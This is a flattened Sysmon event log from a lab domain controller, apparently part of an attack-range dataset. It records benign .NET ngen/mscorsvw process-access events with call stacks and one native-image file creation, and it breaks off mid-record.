13:21:40.898{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4564-6000-B601-000000009A01}2300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:41.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4565-6000-B901-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:41.210{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4565-6000-B901-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:41.210{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4565-6000-B901-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:41.070{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4565-6000-B801-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:41.054{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4565-6000-B801-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:41.054{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4565-6000-B801-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.992{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4566-6000-BD01-000000009A01}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.992{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4566-6000-BD01-000000009A01}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.945{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4566-6000-BC01-000000009A01}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.929{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4566-6000-BC01-000000009A01}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.929{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4566-6000-BC01-000000009A01}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.851{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4566-6000-BB01-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.835{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4566-6000-BB01-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.835{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4566-6000-BB01-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.788{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4566-6000-BA01-000000009A01}3412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.773{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4566-6000-BA01-000000009A01}3412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:42.773{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4566-6000-BA01-000000009A01}3412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:42.679{08A6967A-4565-6000-B901-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b78-0\Microsoft.CSharp.dll2021-01-14 13:21:42.679 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.538{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4567-6000-BF01-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.523{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4567-6000-BF01-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.523{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4567-6000-BF01-000000009A01}4004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.398{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4567-6000-BE01-000000009A01}4440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.367{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4567-6000-BE01-000000009A01}4440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:43.367{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4567-6000-BE01-000000009A01}4440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.3031